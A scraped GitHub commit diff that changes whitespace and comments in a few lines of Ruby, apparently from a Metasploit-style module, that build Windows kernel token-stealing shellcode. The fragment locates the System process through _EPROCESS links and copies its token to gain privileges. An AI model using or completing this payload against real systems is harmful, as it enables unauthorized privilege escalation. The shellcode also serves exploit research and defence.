You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
tokenstealing << "\x89\x1d" + [backup_token].pack('V')# mov dword ptr ds:backup_token, ebx # Optionaly write a copy of the token to the address provided
tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"# sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
149
+
tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"# sub eax, 88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
148
150
tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"# cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
149
-
tokenstealing << "\x75\xe8"# jne 0000101e ======================
150
-
tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"# mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
151
+
tokenstealing << "\x75\xe8"# jne 0000101e ======================|
152
+
tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"# mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
0 commit comments